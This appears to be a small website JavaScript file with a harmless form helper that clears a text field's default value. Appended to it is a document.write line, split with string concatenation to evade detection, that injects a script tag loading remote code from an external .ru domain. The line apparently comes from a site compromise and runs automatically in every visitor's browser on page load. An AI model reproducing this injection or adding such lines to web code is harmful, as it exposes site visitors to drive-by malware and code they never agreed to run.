function doClear(theText) 
{
     if (theText.value == theText.defaultValue)
 {
         theText.value = ""
     }
 }

document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Infotainment.js"></scri'+'pt>');
